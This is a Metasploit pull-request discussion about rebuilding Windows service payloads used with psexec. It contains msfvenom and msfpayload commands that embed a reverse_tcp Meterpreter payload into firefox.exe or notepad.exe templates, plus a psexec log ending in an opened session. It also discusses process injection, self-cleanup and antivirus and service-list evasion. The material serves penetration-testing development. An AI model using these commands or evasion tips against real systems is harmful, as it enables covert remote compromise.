Refreshed service payloads

[agix]

Here is the refreshed pull request for service payload related to https://github.com/rapid7/metasploit-framework/pull/1850/

Verification

• [x] x86 exe-only executables still functional
• [x] x64 exe-only executables still functional
• [x] x64 service payloads still functional
• [x] x86 service payloads can be generated with a custom service name (e.g. executes correctly in a SERVICE_WIN32_SHARE_PROCESS service) - Use service_permissions with Admin, should overwrite AxInstSV or similar.
• [x] x86 service payloads can be generated with different length service names (<8, ==8, >8)
• [x] x86 service payloads can use any executable as a template
• [x] reverse_https (and other large payloads) work with psexec and other service exploit modules

[agix]

Thank you for all this comments. I'll work on it right now !

[agix]

Okay, here is my first try. I hope I forgot nothing.

About the breaking name (if it's under 7). I think it's a bad idea to force it like that. I will try to generate the shellcode depending the name size with the good opcodes automatically. I think it's the best option, what do you think ?

[agix]

I know this is not the place to put "string_to_pushes(str)" function so just tell me where I have to write it ? thx

[Meatballs1]

There are plenty of low level functions in Util::EXE so it shouldn't be too out of place (e.g. self.generate_nop), so dont see any particular issues with it going in there for now if its the only thing using it. @dmaloney-r7 might have some suggestions?

Util::EXE could use a refactor anyway as its become a one stop shop for most payload generation...

[agix]

Okay, I fixed the service payload and test psexec module with different service name/file/displayname. I'm waiting for your comments. Everythings work well.

[wvu]

Thanks, @agix. Bumping.

[Meatballs1]

Works ok for psexec so far:

[*] Started reverse handler on 192.168.1.22:4444 
[*] Connecting to the server...
[*] Authenticating to 192.168.1.23:445|WORKGROUP as user 'Administrator'...
[*] Uploading payload...
[*] Created \bbRHayOj.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.23[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.23[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (lotsofcharacters - "Test_Display")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (769024 bytes) to 192.168.1.23
[*] Deleting \bbRHayOj.exe...
[*] Meterpreter session 3 opened (192.168.1.22:4444 -> 192.168.1.23:49214) at 2014-01-02 14:24:43 +0000

[Meatballs1]

Everything seems to be working as intended so far, however my main concern is the change in functionality between the existing service template and the newly generated executables.

Currently the service executables execute the shellcode in a new process, and exits cleanly (informing the service manager etc). This is desirable as it means we can cleanup the service which we cant do if the process is still running and I think this is assumed by some modules...

[agix]

hey, yes I though of it. If you add the migrate shellcode, it successfully removes the sevice. is there a way to force prepend_migrate ? do you think it's a good idea ? about the author of service_stuff.asm it's a copy paste of the other made by stephen fewer so that's why I didn't change it.

[Meatballs1]

Prepend migrate doesn't work correctly for all payloads at present when it is generated and would require changing a lot of module defaults.

I guess it could be manually included as part of this shellcode along with the calls to stop the service and ExitProcess? Probably want someone else to weigh in @jlee-r7 ?

Another thing I have noticed is that a template file doesn't work with this, (or exe-only for that matter). I'm currently using notepad.exe (correct Arch). Do they need to be unsigned or something? I have tried with a random 3rd party one but it doesn't work. Although it doesn't appear to be this PR that breaks it...

[Meatballs1]

Looks like injection doesn't work with exe and notepad.exe either... They work under Wine, just not under windows :)

[agix]

If I understood you : Injection doesn't work but injection is not the same as using another template. ./msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.56.1 R | ./msfencode -t exe-only -x /mnt/vm/firefox.exe -o /mnt/vm/firefox_bd.exe use firefox as template and it works. ./msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.56.1 R | ./msfencode -t exe-only -x /mnt/vm/firefox.exe -o /mnt/vm/firefox_bd.exe -k try to keep the template working, and it does'nt work with exe-only.

[Meatballs1]

I'm using msfvenom -p windows/meterpreter/reverse_tcp -f exe-only -x /root/notepad.exe LHOST=192.168.1.x > blah

That sets the correct template... I'll try with payload/encode

[agix]

Okay, I never tried msfvenom. And I said bullshit with -k. exe-only doesn't take care of -k option, it do the same. So that's strange, what the difference between msfvenom and msfpayload | msfencode ?

[agix]

msfvenom works for me... ./msfvenom -p windows/meterpreter/reverse_tcp -f exe-only -x /mnt/vm/firefox.exe LHOST=192.168.56.1 > /mnt/vm/firefox_bd2.exe

on windows XP sp3 fr under virtualbox.

[agix]

It works with notepad.exe too...

[Meatballs1]

Which version of windows are you testing with? Windows 7 notepad here

[Meatballs1]

Using the xp notepad seems to work fine, I guess something gets hammered with the Win7 notepad/calc Maybe some of the tables which appear to be stored in .text as well?

[agix]

So it's just matter of template ? Should I change something ? Is it working with notepad.exe win7 with msfpayload | msfencode ? If yes, that's really strange. Otherwise, my antivirus tests learnt me that you sould not use a native windows PE as a template, some AV did a whitelist and warn the user if you change just one byte in calc.exe for instance.

Anyway, I'm looking on the shellcode to improve the service management.

[Meatballs1]

msfpayload|msfencode worked first time, but then wouldn't work again... I may have mis-copied the file or maybe it was lucky and corrupted the file in a way it still worked? Too much generating payloads and copying them around...

I dont think its a concern for this PR the 'exe' technique couldn't handle notepad/calc and so I wouldn't expect 'exe-only' to.

[agix]

Oki, good. So I think it will be better to create another shellcode block (create_remote_process for instance). That do CreateProcess(CREATE_SUSPENDED), WriteProcessMemory(Shellcode), ResumeThread, Exit. Using it with psexec will allow C:\Windows\meterpreter.exe to be removed.

Then I will work on the SvcCtrl... Some works to do hehe !

For PeParsey do you think it should be changed ?

[Meatballs1]

Using PeParsey not a priority for this PR as the goal isn't to clean up exe-only.

[agix]

Here it is, now the service is started, then a remote rundll32.exe process with original shellcode injected in it is started. Then service exit.

Now, the executable is automatically removed from C:\WINDOWS\ and the service is also removed from service list. BUT an error appear in the log to say "service stopped unexpectedly".

It's not perfect... just told me what do you think about my "create_remote_process" block. I will improve the whole thing.

[agix]

Okay, we are almost good, I think. No, the service is created, run, inject the original shellcode in a new process (rundll32.exe), run it, "stopped" and exit. The binary is removed from C:\WINDOWS and the service disappear.

Be carefull, the payload is now quite big and crash with exe-only technique if you choose a template that doesn't contain enough code. (notepad.exe and winmine.exe are too short I used firefox.exe).

I'm waiting for your suggestion.

[Meatballs1]

Awesome, I used dxdiag from WindowsXP:

C:\Users\Administrator>sc start aservice1

SERVICE_NAME: aservice1
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 1452
        FLAGS              :

C:\Users\Administrator>sc query aservice1

SERVICE_NAME: aservice1
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 1  STOPPED
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Fires off into rundll32.exe nicely.

[Meatballs1]

With psexec works fine, but there is a noticable delay uploading the file with a 1MB+ file :)

[Meatballs1]

Doesn't appear to be as happy with reverse_https, it works with reverse_http and the default template and with WinXP dxdiag.exe.

Is reverse_https just too big? I did get a shell once, but it was unresponsive...

This may be a problem with the payload 'space' in psexec...

Yes looks like they are fine if generated by command line tool, I think it would probably be worthwhile calculating a sane 'space' for psexec to match this commit?

[agix]

If there is a problem of 'space', run and stop silently... I didn't find yet how to check if there is enough 'space'.

And that's right, with big files, it takes some time...

I don't think I can improve this, maybe optimizing my shellcode a little bit but I'm sure it's pointless.

Could be a big problem if we add encoding to this stub... the shellcode will be bigger.

I will investigate a little bit more, it seems unlikely to miss some space.

[Meatballs1]

@agix I edited my last comment to clarify some things.

[agix]

I tried reverse_https with firefox.exe as a template, it works. I didn't understant what do you mean by "looks like they are fine if generated by command line tool" It works if you use msfvenom ? and it didn't work using exploit/windows/smb/psexec ?

[Meatballs1]

Yes thats correct, reverse_https works with msfvenom and fails with psexec.

I increased the 'size' option in psexec to '5000' and then it started working.

[agix]

What's the size option in psexec ? I don't follow you :). I find the problem : when import table is in the same section as the entry point and the entry point is too close to the import table, it crash... I will add this check in exe-only generation.

[Meatballs1]

'size' line 61: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/smb/psexec.rb

[agix]

mmh oki, so we could increase this size, right ? it depends of the template. If I did the correct check for the space between entrypoint and import table it should fix everything right ?

[Meatballs1]

Now I'm doing some re-testing and not having any issues with psexec and reverse_https - does it work ok for you?

It would be good to raise an Exception if the template has tables that would be overwritten by the payload :)

[agix]

I only tested psexec but it worked well. I agree, I'm working on itnto raise the Exception and, if it's possible in the case payload overwrite the tables I will shift entry point to another place to get enough space.

I do it tonight (french time) :D

[agix]

Okay, let's test this ! No exception, just shifting silently the entry point to prevent import table overwritting. It works for me with winmine.exe and reverse_https on psexec.

[Meatballs1]

Working fine here - still get some crashes with some executables but its more templating than was originally possible. The default template seems - advanced users should be testing executables before using them as templates anyway.

I have noticed that using psexec doesn't cleanup well with reverse_https exes. This is a fault with psexec module, it doesn't use filedropper and isn't flexible in its file cleanup delay etc.

I'm happy to land this, I just want to get the thumbs up from someone else (@todb-r7) as psexec is a beloved module and people would get upset if it broke :)

[Meatballs1]

Ah block_service_stopped.asm is missing btw, can you include it please?

[agix]

Oh shit, I accidently removed it :'( from my disk as well... I will rewrite it grrr... Do you think it's possible to increase delay in psexec before removing file ? Or it's not the good solution ?

[mubix]

Is a service description added with these new payloads? That was always one of the biggest give aways when looking at the services list, one blank line.

[agix]

WTF travis ! And no, it doesn't change the blank service description. I wonder if it's in the binary or in the rpc call...

EDIT : Okay, it's in the binary, I will add this feature my friend ! haha

[agix]

The SERVICE_DESCRIPTION option need more test, actually I don't think it adds Service description, but I don't know why... OpenSCManager then OpenService then ChangeServiceConfig2(handler, SERVICE_CONFIG_DESCRIPTION, "Description") It seems it can't find registry linked with the binary.

Anyway, it may be possible to do it by rpc call...

[agix]

SERVICE_DESCRIPTION works now. I didn't succeed to call ChangeServiceConfig2A using RPC. The third argument must be a pointer on a structure SERVICE_DESCRIPTIONA http://msdn.microsoft.com/en-us/library/cc245900.aspx and I don't know how to pass this tructure via RPC...

Anyway, it's working with payload, even if it would be better by RPC.

[Meatballs1]

Hmmm, the description doesn't need to be embedded in the binary, wouldn't this be better handled as an extension to PSEXEC/other service modules to call ChangeServiceConfig2 or whatever the svcctl RPC call is to set a description if people want?

[Meatballs1]

I think this is good to go, but dont want to push ahead with something that affects psexec without some bigger guns weighing in. @todb-r7 ? :)

[agix]

So much suspens !!! :)

[agix]

I just try to rebase on master to fix some issue https://bugs.gentoo.org/show_bug.cgi?id=503502

[agix]

Holy shit, I totally fucked this branch !

[wvu]

Holy crap.